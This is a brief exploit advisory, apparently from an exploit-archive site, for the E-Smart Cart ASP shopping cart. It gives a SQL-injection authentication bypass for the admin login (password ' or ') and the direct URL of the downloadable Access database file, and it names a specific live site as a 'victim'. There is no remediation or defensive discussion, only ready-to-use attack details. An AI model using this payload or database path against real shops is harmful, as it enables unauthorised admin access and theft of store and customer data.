E-Smart Cart suffers from remote SQL injection and database disclosure vulnerabilities.
6f3982c0ba1ef7beb949fceabc22156ab76a83de5fb0799f038b2ca17319695b
#########################################################
---------------------------------------------------------
Portal Name: E-SMART CART
Vendor : http://preproject.com/smartcart.asp
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,DD)
---------------------------------------------------------
#########################################################
[Auth Bypass]:
http://www.site.com/[Path]/embadmin/admin_main.asp
user: admin
pass: ' or '
[DD]:
http://www.site.com/[Path]/database/pre_shoppingmall.mdb
---------------------------------
Victem :
http://www.preproject.com/GScart